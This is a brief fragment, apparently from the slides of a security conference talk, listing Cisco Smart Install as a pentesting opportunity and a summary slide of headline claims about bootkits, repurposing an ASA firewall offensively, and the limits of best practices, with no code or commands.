     • Cisco Smart Install. Pentester's opportunities

  67. Summary
     • Without hardware protection, bootkit development is not rocket science;
     • Watch a defensive tool (like an ASA firewall) become an offensive one;
     • Independent research;
     • More independent research;
     • Best practices just give you an illusion of security.